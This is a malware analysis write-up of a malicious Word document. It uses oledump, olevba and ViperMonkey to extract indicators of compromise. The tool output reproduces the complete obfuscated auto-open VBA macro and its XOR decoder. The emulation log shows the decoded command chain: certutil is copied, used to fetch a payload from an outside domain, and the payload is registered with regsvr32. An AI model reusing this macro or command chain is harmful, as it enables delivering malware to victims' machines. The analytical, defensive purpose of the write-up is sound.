In this post, we're going to briefly analyze a malicious document. By using certain tools, we'll be able to extract IOCs, and understand what the malicious code hidden within a Macro attempts to do.
General information
Let's get started by looking at the streams of data within the file with oledump.py.
A first look indicates that there are 3 different macros within the malicious document.
Analysis
Manual Extraction
The macro that holds most interest is the first one find in the streams.
Let's dissect the command running below:
The -s flag is set for selecting the data stream
The 3 will be the data stream that we want to dump
The -S flag will perform a strings dump of the code
$ oledump.py -s 3 -S malicious.doc
12%2%11%79%64%12%79%77%28%10%27%79%26%82%26%29%3%73%73%12%14%3%3%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%10%23%10%79%64%74%26%74%49%12%49%14%49%12%49%7%49%10%49%79%64%9%49%79%7%27%27%31%85%64%64%87%12%9%14%22%25%65%12%0%2%64%13%0%3%13%64%5%14%10%1%27%65%31%7%31%80%3%82%3%6%26%27%89%65%12%14%13%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%79%73%73%79%12%14%3%3%79%29%10%8%28%25%29%92%93%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%77$
cmd /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe
Attribut
e VB_Nam
e = "T"
Sub aut
oopen()
dh("1
2%2%11%7`9%64%
7%28%10%
.26%8
6%29%3%73
44%85%51
F0%8
2%43%
94%65
t74%
h\2%
w0%1
7"@y
m XN As
New WshS
hell
.run(
"cmd /c
set u=tu@til&&c
opy C:\W
indows\S
ystem32\
cer%u%.e
Progr
amData\1a
", 0
End
From the extracted strings we can establish the following:
There is a command run in the command line
A variable is set, u
An executable is being run from the System32 folder.
Hypothetically a malicious executable is being dropped into the ProgramData folder.
There is also an interesting and rather odd string of characters that needs further analysis, perhaps via emulation!
12%2%11%79%64%12%79%77%28{...}
The second macro is not that much of a macro unfortunately. It does have a stream with VBA code, but just some attribute statements:
$ oledump.py -s 4 -S malicious.doc
Attribut
e VB_Nam
e = "Thi
sDocumen
1Normal
VGlobal!
Spac
Crea
tabl
Pre decla
BExp
Temp
lateDeri
$Custom
(1Normal.ThisDocument
$*\Rffff*08610d3149
The third macro is also quite short, compared to the first macro and does not hold much interest for us "out of the box".
$ oledump.py -s 10 -S malicious.doc
util'
Attribut
e VB_Nam
e = "d"
Functio
n h(ju)
dSpli
<, "%"
P@For lc
To UBou nd(eR
& Chr
&(lc) X
>Next
}vY(
L"util
Another tool that we can use to easily see the contents of the macros embeded in the document would be using olevba, which will attempt to extract the contents of the file.
This will give us a faster overview of what is happening in the macros and even allow us, if possible, to decode and deofuscate code within the macros.
Finally, it will give us an overview of what is occuring in the different macros and if there is any suspicious activity within them.
$ olevba malicious.doc
pywin32 is not installed (only is required if you want to use MS Excel)
olevba 0.60 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: malicious.doc
Type: OpenXML
WARNING For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO T.bas
in file: word/vbaProject.bin - OLE stream: 'VBA/T'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub autoopen()
LG = h("12%2%11%79%64%12%79%77%28%10%27%79%26%82%26%29%3%73%73%12%14%3%3%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%10%23%10%79%64%74%26%74%49%12%49%14%49%12%49%7%49%10%49%79%64%9%49%79%7%27%27%31%85%64%64%87%12%9%14%22%25%65%12%0%2%64%13%0%3%13%64%5%14%10%1%27%65%31%7%31%80%3%82%3%6%26%27%89%65%12%14%13%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%79%73%73%79%12%14%3%3%79%29%10%8%28%25%29%92%93%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%77")
Dim XN As New WshShell
Call XN.run("cmd /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe", 0)
Call XN.run(LG, 0)
End Sub
-------------------------------------------------------------------------------
VBA MACRO d.bas
in file: word/vbaProject.bin - OLE stream: 'VBA/d'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Function h(ju)
eR = Split(ju, "%")
For lc = 0 To UBound(eR)
hh = hh & Chr(eR(lc) Xor 111)
Next lc
h = hh
End Function
Function vY()
vY = "util"
End Function
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |autoopen |Runs when the Word document is opened |
|Suspicious|run |May run an executable file or a system |
| | |command |
|Suspicious|Call |May call a DLL using Excel 4 Macros (XLM/XLF)|
|Suspicious|Windows |May enumerate application windows (if |
| | |combined with Shell.Application object) |
|Suspicious|Chr |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
|Suspicious|Xor |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|IOC |1.exe |Executable file name |
+----------+--------------------+---------------------------------------------+
VBA Emulation
In some cases when analyzing documents that contain malicious macros, the best way to know what they do is to make the macros RUN. Of course, that should be done in an isolated environment, such as a sandbox created for analyzing malware or a virtual machine for such purposes.
One of the ways that we can do so is to use a VBA emulator. The one we will be using is ViperMonkey, which coincidentally extracts the VBA code using olevba (which we used to gather information in General information) and then parses the code, executes it and gives us a general idea of what actions are being taken by the code, such as downloading and writing files.
$ vmonkey malicious.doc
_ ___ __ ___ __
| | / (_)___ ___ _____/ |/ /___ ____ / /_____ __ __
| | / / / __ \/ _ \/ ___/ /|_/ / __ \/ __ \/ //_/ _ \/ / / /
| |/ / / /_/ / __/ / / / / / /_/ / / / / ,< / __/ /_/ /
|___/_/ .___/\___/_/ /_/ /_/\____/_/ /_/_/|_|\___/\__, /
/_/ /____/
vmonkey 1.0.3 - https://github.com/decalage2/ViperMonkey
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/ViperMonkey/issues
===============================================================================
FILE: attacker3.doc
INFO Starting emulation...
INFO Emulating an Office (VBA) file.
INFO Reading document metadata...
<output ommitted>
WARNING File is not an Excel 97 file. Not reading with xlrd2.
INFO Saving dropped analysis artifacts in .//attacker3.doc_artifacts/
INFO Parsing VB...
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO T.bas
in file: word/vbaProject.bin - OLE stream: u'VBA/T'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-------------------------------------------------------------------------------
VBA CODE (with long lines collapsed):
<output ommitted>
-------------------------------------------------------------------------------
PARSING VBA CODE:
INFO parsed Sub autoopen (): 4 statement(s)
-------------------------------------------------------------------------------
VBA MACRO d.bas
in file: word/vbaProject.bin - OLE stream: u'VBA/d'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-------------------------------------------------------------------------------
VBA CODE (with long lines collapsed):
<output ommitted>
-------------------------------------------------------------------------------
PARSING VBA CODE:
INFO parsed Function h ([ByRef ju]): 3 statement(s)
INFO parsed Function vY (): 1 statement(s)
INFO Reading document variables...
INFO Reading document comments...
INFO Reading Shapes object text fields...
INFO Reading InlineShapes object text fields...
INFO Reading TextBox and RichEdit object text fields...
INFO Reading custom document properties...
INFO Reading embedded object text fields...
INFO Reading document text and tables...
Traceback (most recent call last):
File "/opt/vipermonkey/lib/python2.7/site-packages/vipermonkey/core/../export_doc_text.py", line 20, in <module>
from unotools import Socket, connect
ModuleNotFoundError: No module named 'unotools'
ERROR Running export_doc_text.py failed. Command '['timeout', '30', 'python3', '/opt/vipermonkey/lib/python2.7/site-packages/vipermonkey/core/../export_doc_text.py', '--text', '-f', '/tmp/tmp_word_file_8096341053']' returned non-zero exit status 1
INFO Reading form variables...
-------------------------------------------------------------------------------
TRACING VBA CODE (entrypoint = Auto*):
INFO Emulating loose statements...
INFO ACTION: Found Entry Point - params 'autoopen' -
INFO evaluating Sub autoopen
INFO calling Function: h('12%2%11%79%64%12%79%77%28%10%27%79%26%82%26%29%3%73%73%12%14%3%3%79%44%85%51%63...)
INFO calling Function: Split('12%2%11%79%64%12%79%77%28%10%27%79%26%82%26%29%3%73%73%12%14%3%3%79%44%85%51%63...)
INFO calling Function: UBound(['12', '2', '11', '79', '64', '12', '79', '77', '28', '10', '27', '79', '26', '8...)
WARNING Variable 'hh' not found
INFO calling Function: eR(0)
INFO calling Function: eR(1)
<output ommitted>
INFO calling Function: eR(79)
INFO Found possible intermediate IOC (URL): 'cmd /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://8cfayv.c'
INFO calling Function: eR(80)
<output ommitted>
INFO calling Function: eR(99)
INFO Found possible intermediate IOC (URL): 'cmd /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://8cfayv.com/bolb/jaent.php?l='
WARNING Throttling output logging...
INFO Found possible intermediate IOC (URL): 'cmd /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://8cfayv.com/bolb/jaent.php?l= ...'
INFO Calling Procedure: XN.run("['cmd /c set u=tutil&&call copy C:\\\\Windows\\\\System32\\\\cer%u%.exe C:\\\\ProgramDat...")
INFO ACTION: XN.run - params ['cmd /c set u=tutil&&call copy C:\\Windows\\System32\\cer%u%.exe C:\\ProgramData\\1.exe', 0] - Interesting Function Call
INFO ACTION: Object.Method Call - params ['cmd /c set u=tutil&&call copy C:\\Windows\\System32\\cer%u%.exe C:\\ProgramData\\1.exe', 0] - XN.run
INFO ACTION: Run - params 'exe' - Interesting Function Call
WARNING Application.Run() failed. Cannot find function exe.
INFO Calling Procedure: XN.run('[\'cmd /c "set u=url&&call C:\\\\ProgramData\\\\1.exe /%u%^c^a^c^h^e^ /f^ http://8cfa...')
INFO ACTION: XN.run - params ['cmd /c "set u=url&&call C:\\ProgramData\\1.exe /%u%^c^a^c^h^e^ /f^ http://8cfayv.com/bolb/jaent.php?l=liut6.cab C:\\ProgramData\\1.tmp && call regsvr32 C:\\ProgramData\\1.tmp"', 0] - Interesting Function Call
INFO ACTION: Object.Method Call - params ['cmd /c "set u=url&&call C:\\ProgramData\\1.exe /%u%^c^a^c^h^e^ /f^ http://8cfayv.com/bolb/jaent.php?l=liut6.cab C:\\ProgramData\\1.tmp && call regsvr32 C:\\ProgramData\\1.tmp"', 0] - XN.run
INFO ACTION: Run - params 'tmp"' - Interesting Function Call
WARNING Application.Run() failed. Cannot find function tmp".
Recorded Actions:
+--------------------+---------------------------+---------------------------+
| Action | Parameters | Description |
+--------------------+---------------------------+---------------------------+
| Found Entry Point | autoopen | |
| XN.run | ['cmd /c set | Interesting Function Call |
| | u=tutil&&call copy C:\\Wi | |
| | ndows\\System32\\cer%u%.e | |
| | xe | |
| | C:\\ProgramData\\1.exe', | |
| | 0] | |
| Object.Method Call | ['cmd /c set | XN.run |
| | u=tutil&&call copy C:\\Wi | |
| | ndows\\System32\\cer%u%.e | |
| | xe | |
| | C:\\ProgramData\\1.exe', | |
| | 0] | |
| Run | exe | Interesting Function Call |
| XN.run | ['cmd /c "set u=url&&call | Interesting Function Call |
| | C:\\ProgramData\\1.exe | |
| | /%u%^c^a^c^h^e^ /f^ http: | |
| | //8cfayv.com/bolb/jaent.p | |
| | hp?l=liut6.cab | |
| | C:\\ProgramData\\1.tmp && | |
| | call regsvr32 | |
| | C:\\ProgramData\\1.tmp"', | |
| | 0] | |
| Object.Method Call | ['cmd /c "set u=url&&call | XN.run |
| | C:\\ProgramData\\1.exe | |
| | /%u%^c^a^c^h^e^ /f^ http: | |
| | //8cfayv.com/bolb/jaent.p | |
| | hp?l=liut6.cab | |
| | C:\\ProgramData\\1.tmp && | |
| | call regsvr32 | |
| | C:\\ProgramData\\1.tmp"', | |
| | 0] | |
| Run | tmp" | Interesting Function Call |
+--------------------+---------------------------+---------------------------+
INFO Found 1 possible IOCs. Stripping duplicates...
VBA Builtins Called: ['Chr', 'Split', 'UBound']
Finished analyzing attacker3.doc .
Findings
The document contains three macros, one of which is the culprit of the malicious activity which downloads a malicious executable into the ProgramData folder within the machine.
An executable with name 1.exe is downloaded
It is downloaded from 8cfayv[.]com/bolb/jaent.p hp?l=liut6[.]cab
Executable is downloaded to C:\ProgramData folder.
Data stream 3 is that in which the malicious program is being executed.